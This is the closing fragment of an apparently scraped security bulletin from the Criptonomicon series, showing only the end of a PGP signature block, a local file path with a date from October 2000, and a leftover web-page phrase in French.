iQA/AwUBOOyoyYUNKyrTCJjtEQLllwCgjDt3DEtysl6pPyiR2mcNO+dW7JoAoL5B
g9kzqkWDzYfm6/mmAZZTGO/0
=GYKR
-----END PGP SIGNATURE-----

file:///C|/TEMP/criptonomicon/criptonomicon/boletines/boletin69.txt (13 of 13) [25/10/2000 02:35:20 p.m.]

Vous aimerez peut-être aussi